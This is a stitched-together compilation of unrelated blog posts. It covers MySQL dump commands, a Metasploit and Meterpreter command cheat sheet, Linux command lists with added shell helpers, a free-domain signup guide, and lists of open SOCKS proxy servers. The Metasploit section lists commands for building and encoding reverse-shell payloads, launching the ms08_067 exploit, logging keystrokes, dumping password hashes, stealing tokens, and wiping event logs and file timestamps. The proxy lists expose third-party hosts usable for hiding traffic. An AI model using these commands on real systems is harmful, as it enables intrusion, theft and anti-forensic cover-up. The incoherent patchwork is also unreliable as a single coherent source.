Importing and exporting MySQL databases on Linux

1. Export a database with the mysqldump command (mind the MySQL installation path, i.e. the directory this command lives in):
(1) Export both the data and the table structure:
mysqldump -uUSERNAME -pPASSWORD DBNAME > DBNAME.sql
#/usr/local/mysql/bin/   mysqldump -uroot -p abc > 8090sec.sql
With -p given on its own, you are prompted for the password after pressing Enter.

(2) Export the table structure only:
mysqldump -uUSERNAME -pPASSWORD -d DBNAME > DBNAME.sql
#/usr/local/mysql/bin/   mysqldump -uroot -p -d abc > 8090sec.sql

Note: /usr/local/mysql/bin/ -> the MySQL directory where these commands live
2. Import a database
(1) First create an empty database:
mysql>create database abc;

(2) Import the database
Method 1:
(a) Select the database
mysql>use abc;
(b) Set the database character set
mysql>set names utf8;
(c) Import the data (mind the path of the .sql file)
mysql>source /home/abc/8090sec.sql;
Method 2:
mysql -uUSERNAME -pPASSWORD DBNAME < DBNAME.sql
#mysql -uabc_f -p abc < 8090sec.sql

The second method is recommended for imports.

Note: some of the lines above are shell commands and some are SQL statements typed at the mysql> prompt.
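As an added example (not part of the original post), the POSIX shell helpers below wrap the export and import commands above. Giving the password on the command line as -pPASSWORD exposes it to every local user through ps and leaves it in the shell history, so the helpers write a throw-away option file readable only by the caller and hand it to mysqldump and mysql with --defaults-extra-file, which both clients accept. They also check that a dump ends with mysqldump's "-- Dump completed on" trailer, so a dump cut short by a full disk or a killed process is noticed before it is imported. The database name, file paths and credentials are placeholders.

```shell
#!/bin/sh
# Added example: MySQL dump/restore helpers that keep the password off the command line.
# Assumes mysqldump and mysql are on PATH; names and paths below are placeholders.
set -eu

# Write a temporary MySQL option file holding the credentials.
# usage: make_cnf <path> <user> <password>
make_cnf() {
    # umask in a subshell so the file is created 0600 without touching the caller's umask
    ( umask 077; printf '[client]\nuser=%s\npassword=%s\n' "$2" "$3" > "$1" )
    chmod 600 "$1"
}

# Return 0 when the dump ends with mysqldump's completion marker, 1 otherwise
# (a dump truncated by a full disk or a killed process lacks it).
# usage: dump_is_complete <file.sql>
dump_is_complete() {
    [ -s "$1" ] || return 1
    tail -n 1 "$1" | grep -q '^-- Dump completed on'
}

# Export data and table structure (add -d for structure only, as in the post).
# usage: export_db <cnf> <database> <out.sql>
export_db() {
    mysqldump --defaults-extra-file="$1" --single-transaction "$2" > "$3"
    dump_is_complete "$3" || { echo "dump of $2 is incomplete" >&2; return 1; }
}

# Import a dump, forcing the client character set as the post's "set names utf8" does.
# usage: import_db <cnf> <database> <in.sql>
import_db() {
    mysql --defaults-extra-file="$1" --default-character-set=utf8 "$2" < "$3"
}

# Example run (placeholders):
#   cnf=$(mktemp); make_cnf "$cnf" root 'secret'
#   export_db "$cnf" abc 8090sec.sql
#   import_db "$cnf" abc 8090sec.sql
#   rm -f "$cnf"
```

The option file is deleted by the caller once the job is done; --single-transaction gives a consistent snapshot for InnoDB tables without locking them.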

Metasploit (MSF) command reference

show exploits

List all exploit modules in the Metasploit framework.
show payloads

List all payloads in the Metasploit framework.
show auxiliary

List all auxiliary modules in the Metasploit framework.
search name

Search the Metasploit framework for exploits and other modules by name.
info

Show information about the specified exploit or module.
use name

Load an exploit or module.
LHOST

The local IP address the target host can connect back to; when the target is not on the same LAN this usually has to be a public IP. Used in particular by reverse shells.
RHOST

The remote host, i.e. the target host.
set function

Set a specific configuration parameter (e.g. the local or remote host parameters).
setg function

Set a specific configuration parameter globally (e.g. the local or remote host parameters).
show options

List all configuration parameters of an exploit or module.
show targets

List all target platforms the exploit supports.
set target num

Specify the target's operating system and patch level, if you know them.
set payload name

Specify the payload to use.
show advanced

List all advanced configuration options.
set autorunscript migrate -f

Automatically migrate to another process once the exploit completes.
check

Check whether the target is vulnerable to the selected exploit.
exploit

Run the exploit or module against the target.
exploit -j

Run the exploit as a job (the attack runs in the background).
exploit -z

Do not interact with the session after the exploit completes.
exploit -e encoder

Specify the payload encoder to use (e.g. exploit -e shikata_ga_nai).
exploit -h

Show the help for the exploit command.
sessions -l

List the available interactive sessions (used when handling multiple shells).
sessions -l -v

List all available interactive sessions with details, e.g. which vulnerability was used to compromise the system.
sessions -s script

Run a specific Metasploit script on all active Metasploit sessions.
sessions -K

Kill all active interactive sessions.
sessions -c cmd

Execute a command on all active Metasploit sessions.
sessions -u sessionID

Upgrade a plain win32 shell to a Meterpreter shell.
db_create name

Create the database used for database-driven attacks (e.g. db_create autopwn).
db_connect name

Create and connect to the database used for database-driven attacks (e.g. db_connect user:passwd@ip/sqlname).
db_nmap

Run nmap and store the scan results in the database (accepts ordinary nmap options, e.g. -sT -v -P0).
db_autopwn -h

Show the help for the db_autopwn command.
db_autopwn -p -r -e

Run db_autopwn against every open port found, attacking all systems and using a reverse shell.
db_destroy

Delete the current database.
db_destroy user:passwd@host:port/database

Delete a database using the advanced options.
*** Meterpreter commands ***

help

Open the Meterpreter help.
run scriptname

Run a Meterpreter script; all script names can be found in the scripts/meterpreter directory.
sysinfo

List system information about the compromised host.
ls

List the files and directories on the target host.
use priv

Load the privilege-escalation extension, which extends the Metasploit library.
ps

Show all running processes and the user accounts associated with them.
migrate PID

Migrate into the process with the given PID (obtain the PID from the host with the ps command).
use incognito

Load the incognito extension (used to steal tokens from the target host or impersonate users).
list_tokens -u

List the available user tokens on the target host.
list_tokens -g

List the available group tokens on the target host.
impersonate_token DOMAIN_NAME\USERNAME

Impersonate an available token on the target host.
steal_token PID

Steal the token of the given process and impersonate it.
drop_token

Stop impersonating the current token.
getsystem

Escalate to SYSTEM privileges through various attack vectors.
execute -f cmd.exe -i

Run cmd.exe and interact with it.
execute -f cmd.exe -i -t

Run cmd.exe with all available tokens and hide the process.
rev2self

Return to the original user account under which the target host was taken over.
reg command

Interact with the target host's registry: create, delete, query, etc.
setdesktop number

Switch to another user's desktop (depends on which users are logged in).
screenshot

Take a screenshot of the target host's screen.
upload file

Upload a file to the target host.
download file

Download a file from the target host.
keyscan_start

Start keystroke logging on the remote target host.
keyscan_dump

Dump the keystrokes captured on the target host.
keyscan_stop

Stop keystroke logging on the target host.
getprivs

Obtain as many privileges as possible on the target host.
uictl enable keyboard/mouse

Take control of the target host's keyboard and mouse.
background

Send your current Meterpreter shell to the background.
hashdump

Dump the password hashes from the target host.
use sniffer

Load the sniffer module.
sniffer_interfaces

List all network interfaces on the target host.
sniffer_dump interfaceID pcapname

Start sniffing on the target host and dump the capture to the named pcap file.
sniffer_start interfaceID packet-buffer

Start sniffing on the target host with a packet buffer of the given size.
sniffer_stats interfaceID

Get statistics for the interface being sniffed.
sniffer_stop interfaceID

Stop sniffing.
add_user username password -h ip

Add a user on the remote target host.
clearev

Clear the event logs on the target host.
timestomp

Modify file attributes, e.g. the file creation time (anti-forensics).
reboot

Reboot the target host.
*** msfpayload commands ***

msfpayload -h

Show the msfpayload help.
msfpayload windows/meterpreter/bind_tcp O

List all configurable options of the windows/meterpreter/bind_tcp payload (every payload is configurable).
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT X > payload.exe

Create a Metasploit reverse_tcp payload that connects back to LPORT on the LHOST IP, saved as a Windows executable named payload.exe.
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R > payload.raw

Create a Metasploit reverse_tcp payload that connects back to LPORT on the LHOST IP, saved in raw form as payload.raw for later use with msfencode.
msfpayload windows/meterpreter/reverse_tcp LPORT=PORT C > payload.c

Create a Metasploit reverse_tcp payload and export it as C-formatted shellcode.
msfpayload windows/meterpreter/reverse_tcp LPORT=PORT J > payload.java

Create a Metasploit reverse_tcp payload and export it as a %u-encoded JavaScript string.
*** msfencode commands ***

msfencode -h

Show the msfencode help.
msfencode -l

List all available encoders.
msfencode -t (c,elf,exe,java,js_le,js_be,perl,raw,ruby,vba,vbs,loop_vbs,asp,war,macho)

Specify the output format of the encoded buffer.
msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe

Encode the payload.raw file five times with the shikata_ga_nai encoder and write the result to a file named encoded_payload.exe.
msfpayload windows/meterpreter/bind_tcp LPORT=PORT R | msfencode -e x86/countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe

Create a payload that is nested-encoded with several different encoders.
msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c

Create pure alphanumeric shellcode, with the ESI register pointing at the shellcode, output in C format.
*** msfcli commands ***

msfcli | grep exploit

List only the exploit modules.
msfcli | grep exploit/windows

List only the Windows-related exploit modules.
msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=PORT RHOST=IP E

Launch the ms08_067_netapi exploit against IP, configured with the bind_tcp payload listening on PORT.

BT5: connecting Metasploit (MSF) to the PostgreSQL database

1. First check the PostgreSQL port. It is started automatically by default and listens on port 7337:
root@bt:~# netstat -tnpl |grep postgres
tcp        0      0 127.0.0.1:7337          0.0.0.0:*               LISTEN      1100/postgres
tcp6       0      0 ::1:7337                :::*                    LISTEN      1100/postgres
2. Look at the MSF configuration, which contains the database user and password:
root@bt:~# cat /opt/metasploit/config/database.yml
development:
  adapter: "postgresql"
  database: "msf3dev"
  username: "msf3"
  password: "c80c3cea"
  port: 7337
  host: "localhost"
  pool: 256
  timeout: 5

3. Start the MSF Pro edition:
# /opt/metasploit/msfpro
Connect to the database:
msf> db_connect msf3:c80c3cea@127.0.0.1:7337/msf3

Commands for checking the Linux version

1. Check the kernel version:

(1)  [root@SOR_SYS ~]# cat /proc/version
Linux version 2.6.18-238.el5 () (gcc version 4.1.2 20080704 (Red Hat 4.1.2-50)) #1 SMP Sun Dec 19 14:22:44 EST 2010

(2) [root@SOR_SYS ~]# uname -r
2.6.18-238.el5
(3) [root@SOR_SYS ~]# uname -a
Linux SOR_SYS.99bill.com 2.6.18-238.el5 #1 SMP Sun Dec 19 14:22:44 EST 2010 x86_64 x86_64 x86_64 GNU/Linux

2. Check the Linux distribution version:

(1) Log in to the server and run lsb_release -a, which lists all the version information, for example:

[root@SOR_SYS ~]# lsb_release -a
LSB Version: :core-4.0-amd64:core-4.0-ia32:core-4.0-noarch:graphics-4.0-amd64:graphics-4.0-ia32:graphics-4.0-noarch:printing-4.0-amd64:printing-4.0-ia32:printing-4.0-noarch
Distributor ID: RedHatEnterpriseAS
Description: Red Hat Enterprise Linux AS release 4 (Nahant Update 4)
Release: 4
Codename: NahantUpdate4
Note: this command works on all Linux distributions, including Red Hat, SuSE, Debian and others.

(2) Log in to the Linux host and run cat /etc/issue, for example:

[root@SOR_SYS ~]# cat /etc/issue
Red Hat Enterprise Linux Server release 5.6 (Tikanga)
Kernel \r on an \m

(3) Log in to the Linux host and run cat /etc/redhat-release, for example:

[root@SOR_SYS ~]# cat /etc/redhat-release
Red Hat Enterprise Linux AS release 4 (Nahant Update 4)

Note: this way you see the exact version number directly, e.g. AS4 Update 1

(4) Log in to the Linux host and run rpm -q redhat-release, for example:

[root@SOR_SYS ~]# rpm -q redhat-release
redhat-release-5Server-5.6.0.3

Note: this way you see a so-called release number; in the example above it is 5

This release number maps to the actual version as follows:

redhat-release-3AS-1 -> Red Hat Enterprise Linux AS 3
redhat-release-3AS-7.4 -> Red Hat Enterprise Linux AS 3 Update 4
redhat-release-4AS-2 -> Red Hat Enterprise Linux AS 4
redhat-release-4AS-2.4 -> Red Hat Enterprise Linux AS 4 Update 1
redhat-release-4AS-3 -> Red Hat Enterprise Linux AS 4 Update 2
redhat-release-4AS-4.1 -> Red Hat Enterprise Linux AS 4 Update 3
redhat-release-4AS-5.5 -> Red Hat Enterprise Linux AS 4 Update 4

Also: methods (3) and (4) only work on Red Hat Linux

(5) [root@SOR_SYS ~]# file /bin/bash
/bin/bash: ELF 64-bit LSB executable, AMD x86-64, version 1 (SYSV), for GNU/Linux 2.6.9, dynamically linked (uses shared libs), for GNU/Linux 2.6.9, stripped
[root@SOR_SYS ~]#

(6) [root@SOR_SYS ~]# file /bin/cat
/bin/cat: ELF 64-bit LSB executable, AMD x86-64, version 1 (SYSV), for GNU/Linux 2.6.9, dynamically linked (uses shared libs), for GNU/Linux 2.6.9, stripped
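As an added example (not the original author's), the POSIX shell helper below applies the precedence a practitioner would use today: /etc/os-release first (present on every systemd-based distribution and on most others), then the Red Hat-specific /etc/redhat-release, then /etc/issue, which is only a login banner that an administrator may have edited and is therefore the least trustworthy. The root-prefix argument exists so the logic can be exercised against a constructed directory tree; parse_release_pkg splits an rpm -q redhat-release name such as the one in step (4) into the release and version parts the mapping table above is keyed on.

```shell
#!/bin/sh
# Added example: identify the distribution from release files, most reliable first.
# $1 is an optional root prefix (default: none, i.e. the live system) so the
# function can be run against a constructed directory tree for testing.
detect_distro() {
    root="${1:-}"
    if [ -r "$root/etc/os-release" ]; then
        # PRETTY_NAME="Red Hat Enterprise Linux 8.6 (Ootpa)" -> strip the key and quotes
        sed -n 's/^PRETTY_NAME="\{0,1\}\([^"]*\)"\{0,1\}$/\1/p' "$root/etc/os-release"
    elif [ -r "$root/etc/redhat-release" ]; then
        # Red Hat only; carries the exact version string, e.g. "... AS release 4 (Nahant Update 4)"
        head -n 1 "$root/etc/redhat-release"
    elif [ -r "$root/etc/issue" ]; then
        # Login banner: may carry agetty escapes such as \r and \m, and admins edit it freely
        head -n 1 "$root/etc/issue" | sed 's/ *\\[a-zA-Z] *//g'
    else
        echo "unknown"
    fi
}

# Split an rpm package name such as redhat-release-5Server-5.6.0.3 into
# "<release> <version>" (here: "5Server 5.6.0.3"); prints nothing for
# names that do not follow the redhat-release-<release>-<version> pattern.
# usage: parse_release_pkg <name>
parse_release_pkg() {
    printf '%s\n' "$1" | sed -n 's/^redhat-release-\([^-]*\)-\(.*\)$/\1 \2/p'
}

# Kernel release, as in step 1 above (uname -r).
kernel_release() {
    uname -r
}

# Example run on the live system:
#   echo "distro: $(detect_distro)"
#   echo "kernel: $(kernel_release)"
#   parse_release_pkg "$(rpm -q redhat-release 2>/dev/null)"
```

On a host you are auditing, treat the /etc/issue result as a hint only, and cross-check the distribution against the package manager (rpm -q redhat-release or dpkg -l base-files) before relying on it for patch-level decisions.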

A few common Linux commands

lsb_release -a  kernel version and distribution version
arch  show the machine's processor architecture (1)
uname -m  show the machine's processor architecture (2)
uname -r  show the kernel version in use
dmidecode -q  show the hardware components of the system (SMBIOS / DMI)
hdparm -i /dev/hda  list the characteristics of a disk
hdparm -tT /dev/sda  run a read-performance test on a disk
cat /proc/cpuinfo  show CPU information
cat /proc/interrupts  show interrupts
cat /proc/meminfo  check memory usage
cat /proc/swaps  show which swap areas are in use
cat /proc/version  show the kernel version
cat /proc/net/dev  show network adapters and statistics
cat /proc/mounts  show mounted filesystems

shutdown -h now  shut down the system (1)
init 0  shut down the system (2)
telinit 0  shut down the system (3)
shutdown -h hours:minutes &  shut down the system at a scheduled time
shutdown -c  cancel a scheduled shutdown
shutdown -r now  reboot (1)
reboot  reboot (2)
logout  log out

cd /home  change to the '/home' directory
cd ..  go up one directory level
cd ../..  go up two directory levels
cd  go to your home directory
cd ~user1  go to user1's home directory
cd -  return to the previous directory
pwd  show the working directory
ls  list the files in a directory
ls -F  list the files in a directory, marking their type
ls -l  show detailed information about files and directories
ls -a  show hidden files

ls -lh  show permissions (with human-readable sizes)
ls /tmp | pr -T5 -W$COLUMNS  display the listing in 5 columns across the terminal
chmod ugo+rwx directory1  give the owner (u), group (g) and others (o) read (r), write (w) and execute (x) permission on the directory
chmod go-rwx directory1  remove read, write and execute permission on the directory from the group (g) and others (o)
chown user1 file1  change the owner of a file
chown -R user1 directory1  change the owner of a directory and of every file under it
chgrp group1 file1  change the group of a file
chown user1:group1 file1  change the owner and group of a file
find / -perm -u+s  list all files on the system with the SUID bit set
chmod u+s /bin/file1  set the SUID bit on a binary: whoever runs it gets the same privileges as the owner
chmod u-s /bin/file1  clear the SUID bit on a binary
chmod g+s /home/public  set the SGID bit on a directory (like SUID, but for directories)
chmod g-s /home/public  clear the SGID bit on a directory
chmod o+t /home/public  set the sticky bit on a directory: only the legitimate owner may delete files
chmod o-t /home/public  clear the sticky bit on a directory

Special file attributes: use "+" to set an attribute and "-" to clear it
chattr +a file1  allow the file to be opened for writing only in append mode
chattr +c file1  allow the kernel to compress/decompress the file automatically
chattr +d file1  the dump program skips this file during filesystem backups
chattr +i file1  make the file immutable: it cannot be deleted, modified, renamed or linked
chattr +s file1  allow the file to be deleted securely
chattr +S file1  as soon as an application writes to the file, the change is flushed to disk immediately
chattr +u file1  if the file is deleted, the system lets you recover it later
lsattr  show the special attributes

bunzip2 file1.bz2  decompress a file named 'file1.bz2'
bzip2 file1  compress a file named 'file1'
gunzip file1.gz  decompress a file named 'file1.gz'
gzip file1  compress a file named 'file1'
gzip -9 file1  compress with maximum compression
rar a file1.rar test_file  create an archive named 'file1.rar'
rar a file1.rar file1 file2 dir1  compress 'file1', 'file2' and the directory 'dir1' together
rar x file1.rar  extract a rar archive
unrar x file1.rar  extract a rar archive
tar -cvf archive.tar file1  create an uncompressed tarball
tar -cvf archive.tar file1 file2 dir1  create an archive containing 'file1', 'file2' and 'dir1'
tar -tf archive.tar  show the contents of an archive
tar -xvf archive.tar  extract an archive
tar -xvf archive.tar -C /tmp  extract an archive into /tmp
tar -cvjf archive.tar.bz2 dir1  create a bzip2-compressed archive
tar -xvjf archive.tar.bz2  extract a bzip2-compressed archive
tar -cvzf archive.tar.gz dir1  create a gzip-compressed archive
tar -xvzf archive.tar.gz  extract a gzip-compressed archive
zip file1.zip file1  create a zip archive
zip -r file1.zip file1 file2 dir1  compress several files and directories into one zip archive
unzip file1.zip  extract a zip archive
unrar e -p lanlan.rar  extract a password-protected rar archive

apt-get install package_name  install/update a deb package
apt-cdrom install package_name  install/update a deb package from CD-ROM
apt-get update  refresh the package lists
apt-get upgrade  upgrade all installed packages
apt-get remove package_name  remove a deb package from the system
apt-get check  verify that the dependency tree is consistent
apt-get clean  clear the cache of downloaded packages

dpkg -i package.deb  install/update a deb package
dpkg -r package_name  remove a deb package from the system
dpkg -l  show all deb packages installed on the system
dpkg -l | grep httpd  show all deb packages whose name contains "httpd"
dpkg -s package_name  get information about a specific installed package
dpkg -L package_name  show the list of files provided by an installed deb package
dpkg --contents package.deb  show the list of files provided by a package that is not yet installed
dpkg -S /bin/ping  find out which deb package provides the given file

rpm -ivh package.rpm  install an rpm package
rpm -ivh --nodeps package.rpm  install an rpm package, ignoring dependency warnings
rpm -U package.rpm  update an rpm package without changing its configuration files
rpm -F package.rpm  update an rpm package only if it is already installed
rpm -e package_name.rpm  remove an rpm package
rpm -qa  show all rpm packages installed on the system
rpm -qa | grep httpd  show all rpm packages whose name contains "httpd"
rpm -qi package_name  get specific information about an installed package
rpm -qg "System Environment/Daemons"  show the rpm packages in a group
rpm -ql package_name  show the list of files provided by an installed rpm package
rpm -qc package_name  show the list of configuration files provided by an installed rpm package
rpm -q package_name --whatrequires  show the packages that depend on an rpm package
rpm -q package_name --whatprovides  show the size occupied by an rpm package
rpm -q package_name --scripts  show the scripts run during installation/removal
rpm -q package_name --changelog  show the change history of an rpm package
rpm -qf /etc/httpd/conf/httpd.conf  find out which rpm package provides the given file
rpm -qp package.rpm -l  show the list of files provided by an rpm package that is not yet installed
rpm --import /media/cdrom/RPM-GPG-KEY  import a public key
rpm --checksig package.rpm  verify the integrity of an rpm package
rpm -qa gpg-pubkey  verify the integrity of all installed rpm packages
rpm -V package_name  check file size, permissions, type, owner, group, MD5 checksum and last modification time
rpm -Va  check all rpm packages installed on the system (use with care)
rpm -Vp package.rpm  verify an rpm package that is not yet installed
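rpm -V and rpm -Va are the closest thing to a built-in integrity check on an RPM-based system, and a practitioner reads their output for one thing above all: files whose content digest no longer matches the package and that are not configuration files. The helper below is an added example (not from the original list). It reads rpm -V output, discards expected edits to files rpm marks as configuration (the c attribute column), and reports missing files and files with a changed digest (the 5 in the third position of the flag string). The sample lines in the comment and in the test are constructed. The rpm database lives on the same disk as the binaries, so on a host suspected of compromise verify against the original package with rpm -Vp, or against checksums recorded off-host.

```shell
#!/bin/sh
# Added example: triage rpm -V / rpm -Va output for unexpected file modifications.
# rpm -V prints one line per changed file (constructed samples):
#   S.5....T.  c /etc/ssh/sshd_config     <- 9 flag chars, attribute column, path
#   S.5....T.    /usr/bin/ps              <- no attribute: a regular file
#   missing     /usr/sbin/useradd         <- file removed entirely
# Flag positions: S size, M mode, 5 digest, D device, L link, U user, G group,
# T mtime, P capabilities; "." means unchanged.

# Read rpm -V output on stdin and print one "<reason> <path>" line per finding.
# Paths containing spaces are not handled by this awk, which takes the last field.
triage_rpm_verify() {
    awk '
        $1 == "missing" { print "MISSING " $NF; next }
        # attribute column present and equal to "c": a config file, edits are expected
        NF == 3 && $2 == "c" { next }
        # digest differs: the file content is not what the package shipped
        substr($1, 3, 1) == "5" { print "DIGEST " $NF }
    '
}

# Convenience wrapper for the live system (needs rpm installed).
audit_all_packages() {
    rpm -Va 2>/dev/null | triage_rpm_verify
}
```

A changed digest on a binary under /usr/bin or /usr/sbin, or a missing system binary, is the line worth chasing first; a changed mtime alone (the T flag) is common after prelinking or package re-installation and is not reported.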

Introduction to Google's GYBO and applying for a free top-level domain

Tuijianba (推荐吧) already introduced gybo in the article "Get a free .COM top-level domain - gybo"; today we round up all the gybo versions so you have a few more domains to choose from.

What is GYBO?
Its full name is Get Your Business Online, a Google service that helps small businesses (including personal websites) get online quickly and promote themselves. For one year it provides small businesses with free website building, a free .COM domain and hosting space, and even free marketing help. The fee after the first year is said to be very low and merely nominal; if you need it, give it a try.
You can apply through different platforms, and the free domain you get can be transferred out for free after 2 months; in other words, even if you get nothing substantial out of the program, you at least gain a free domain.
1. United States application site: http://www.gybo.com/
Offers com/net/org/biz/info/name domain registration, free for one year, transferable after two months
2. Canada application site: http://www.gybo.ca
Offers free .ca domain registration for one year, transferable after two months
3. Thailand application site: http://www.goonline.in.th/
Requires a Thai IP to be approved; offers free in.th and co.th domain registration (transferable in theory, but you need to find a registrar that accepts these suffixes)
4. India application site: http://www.indiagetonline.in/
Requires an Indian IP to be approved; offers free .in domain registration for 1 year
5. Indonesia site: http://www.bisnisgoonline.co.id/

For users in China, just register directly through the US main site: after entering, click "Sign in with Google", click "Allow access" in the pop-up asking whether to link the account, return to the registration page, then click "Create your website" to reach the site-building page. Set your intuit.com password under "Create a Password", tick the agreement and click "Continue" to reach the success page, which looks like this:

Congratulations on Registering with Intuit
You're on your way to a website! click Choose Your Design to start building it now.

Your Website Signup Confirmation 1/12/2013 - 07:18AM Pacific Standard Time
Account Information
Email ID: xxx@gmail.com (This is your login name)
Package Information
Free for 1 year and $4.99/month thereafter 3 page website 1 Domain name (example:www.fzxmm.com) 30 days of chat support

Click "Continue" to go to the design page, click "Pick the design you want for your website" to start designing, and once the page is designed click "Publish" to publish it.
Publishing automatically generates a domain of the form "hstrial-youraccount.intuitwebsites.com". On the publish page click "Get a Custom Domain", or on the account home page click "Choose a domain (www.yourname.com) for your website", to reach the free .com domain registration page.

Enter the domain you want in the input box at the top, click "Check Availability" and go to the next page; select nothing and click "Get Domain" directly to go to the next page.
After filling in the domain registration details, click "Save & Continue" to go to the next page (untick the "Domain Privacy" option), tick the agreement and click "Submit" to go to the next page. Use a Visa, MasterCard, AMEX or Discover card to verify and activate your free domain.

If anything is unclear, see the official FAQ: http://www.gybo.com/america/faqs-intuit-program-terms

It is free anyway, so even if the website and the support program are nothing special, you at least get a domain out of it. I tried it and it was simpler than expected: log in with a Google account, fill in a batch of details and you are done; the domain was mine in under 15 minutes.

Source: http://vpsorz.com/archives/1286 | VPS-orz

10-08-13 | Socks 5 Proxy Servers Socks 5 dedicated servers

120.72.84.212:7250 | sweden | stockholms lan, stockholm | 19587 | bahnhof.se | 1,594
166.111.132.16:1080 | china | beijing, beijing | unknown | tsinghua.edu.cn | 0,656
173.234.116.172:23537 | united states | new york, new york city | 10116 | orcavirtual.com | 0,469
173.234.116.206:23537 | united states | new york, new york city | 10116 | orcavirtual.com | 0,703
173.68.77.144:42379 | united states | new york, new york city | 10116 | verizon.com | 0,297
173.234.116.197:23537 | united states | new york, new york city | 10116 | orcavirtual.com | 0,484
151.230.90.80:54929 | united kingdom | england, london | wc2n 5rj | sky.com | 1,031
180.169.125.49:8888 | taiwan | t’ai-wan, taipei | unknown | cht.com.tw | 0,766
192.241.234.49:27977 | united states | new york, new york city | 10116 | digitalocean.com | 0,328
202.120.7.122:1080 | china | shanghai, shanghai | unknown | sjtu.edu.cn | 0,688
190.8.44.74:6588 | dominican republic | distrito nacional, santo domingo | 10901 | – | 3,344
202.38.95.66:1080 | china | anhui, hefei | unknown | ustc.edu.cn | 0,719
202.65.216.52:1080 | hong kong | hong kong (sar), hong kong | unknown | dyxnet.com | 0,750
124.208.83.6:39289 | japan | okayama, soja | 719-1131 | dion.ne.jp | 0,563
203.171.233.243:96 | china | henan, zhengzhou | unknown | cpw.com.cn | 0,656
218.202.183.250:1080 | china | xinjiang, urumqi | unknown | chinamobile.com | 1,266
219.223.252.183:1080 | china | guangdong, guangzhou | unknown | hitsz.edu.cn | 1,234
24.184.40.65:2547 | united states | new york, warwick | 10990 | optimum.net | 0,172
24.181.161.105:42701 | united states | wisconsin, eau claire | 54701 | charter.net | 0,563
24.16.231.234:46647 | united states | washington, seattle | 98101 | comcast.com | 0,469
24.128.18.205:22445 | united states | connecticut, hartford | 06101 | comcast.net | 0,391
24.217.83.234:23090 | united states | illinois, belleville | 62220 | charter.net | 0,422
62.149.25.77:10080 | ukraine | kyyiv, kiev | unknown | colocall.net | 0,203
61.19.201.18:8080 | malaysia | perlis, arau | 02600 | – | 0,641
65.125.155.90:8080 | united states | colorado, englewood | 80110 | qwest.net | 0,594
221.132.35.5:2214 | viet nam | ho chi minh, thanh pho ho chi minh | unknown | netcenter.net.vn | 1,344
31.13.130.205:8888 | russian federation | tatarstan, kazan | 422528 | tatar.ru | 0,563
64.194.160.2:7225 | united states | california, whitethorn | 95589 | 101netlink.com | 2,125
68.96.1.118:64815 | united states | arizona, phoenix | 85001 | cox.com | 0,359
66.196.209.90:10827 | united states | oklahoma, oklahoma city | 73102 | logixcom.net | 0,188
69.143.1.46:54917 | united states | virginia, alexandria | 20598 | comcast.net | 0,156
124.125.240.105:1080 | india | gujarat, ahmedabad | 380028 | rcom.co.in | 4,281
75.131.195.75:34551 | united states | georgia, buford | 30515 | charter.net | 0,203
71.93.73.104:42192 | united states | nevada, reno | 89501 | charter.net | 2,000
67.8.252.3:25567 | united states | florida, kissimmee | 34741 | twcable.com | 2,484
85.68.234.87:42219 | france | picardie, rue | 80120 | ncnumericable.com | 0,359
88.150.193.144:6666 | united kingdom | england, gosport | po12 1fw | redstation.com | 0,219
85.214.148.228:60006 | germany | berlin, berlin | 10178 | strato.de | 0,203
80.252.87.82:1080 | netherlands | noord-holland, amsterdam | 1089 | – | 0,203
74.60.252.144:43254 | united states | california, north highlands | 95660 | clearwire.com | 0,500
88.150.215.169:1080 | united kingdom | england, gosport | po12 1fw | redstation.com | 0,422
93.177.169.72:1080 | georgia | t’bilisi, tbilisi | unknown | caucasus.net | 0,266
94.199.76.217:2214 | russian federation | kemerovo, novokuznetsk | 654086 | aaanet.ru | 0,453
67.215.209.227:35853 | united states | kentucky, bardstown | 40004 | cityofbardstown.org | 5,609
98.251.255.28:5110 | united states | tennessee, memphis | 37501 | comcast.net | 1,219
88.198.44.34:10080 | germany | bayern, nuremberg | 90455 | hetzner.de | 0,172
89.104.72.165:10080 | russian federation | moscow city, moscow | 101990 | hc.ru | 0,266
98.251.255.28:17045 | united states | tennessee, memphis | 37501 | comcast.net | 0,234
93.103.201.98:3444 | slovenia | maribor, maribor | 2610 | t-2.net | 0,453
96.252.102.45:31090 | united states | massachusetts, stow | 01775 | verizon.com | 0,547
98.211.28.229:50583 | united states | tennessee, murfreesboro | 37127 | comcast.net | 0,406
98.207.244.241:6952 | united states | california, san francisco | 94102 | comcast.net | 0,656

10-08-13 | US Socks

Check Report:

#-------->Socks4/5 98<-------------
173.71.223.105:43229@SOCKS5 $0sec#United States
199.231.185.77:1080@SOCKS4 $0sec#United States
199.231.185.90:1080@SOCKS4 $0sec#United States
207.182.142.244:443@SOCKS4 $0sec#United States
216.244.78.227:1080@SOCKS4 $0sec#United States
24.183.232.214:3988@SOCKS4 $0sec#United States
24.217.83.234:23090@SOCKS4 $0sec#United States
66.168.170.55:53020@SOCKS4 $0sec#United States
96.252.102.45:31090@SOCKS4 $0sec#United States
173.68.77.144:1508@SOCKS4 $1sec#United States
173.70.24.198:5065@SOCKS4 $1sec#United States
174.50.252.175:29331@SOCKS4 $1sec#United States
174.59.226.249:60995@SOCKS4 $1sec#United States
192.69.200.124:1080@SOCKS4 $1sec#UNITED STATES
198.143.190.94:1080@SOCKS4 $1sec#United States
209.190.35.251:1080@SOCKS4 $1sec#United States
209.249.157.68:55489@SOCKS4 $1sec#United States
216.244.80.153:2500@SOCKS5 $1sec#United States
24.146.175.103:28281@SOCKS4 $1sec#United States
24.184.40.65:2547@SOCKS4 $1sec#United States
24.184.40.65:2547@SOCKS5 $1sec#United States
24.35.162.182:1508@SOCKS5 $1sec#United States
64.194.160.2:7225@SOCKS4 $1sec#United States
64.194.160.2:7225@SOCKS5 $1sec#United States
67.182.151.28:1794@SOCKS4 $1sec#United States
68.188.241.29:5031@SOCKS4 $1sec#United States
68.96.1.118:64815@SOCKS4 $1sec#United States
68.96.1.118:64815@SOCKS5 $1sec#United States
69.143.1.46:55259@SOCKS4 $1sec#United States
69.143.1.46:55259@SOCKS5 $1sec#United States
69.15.234.90:1897@SOCKS4 $1sec#United States
69.15.234.90:1897@SOCKS5 $1sec#United States
71.81.137.163:14079@SOCKS4 $1sec#United States
71.93.73.104:42192@SOCKS5 $1sec#United States
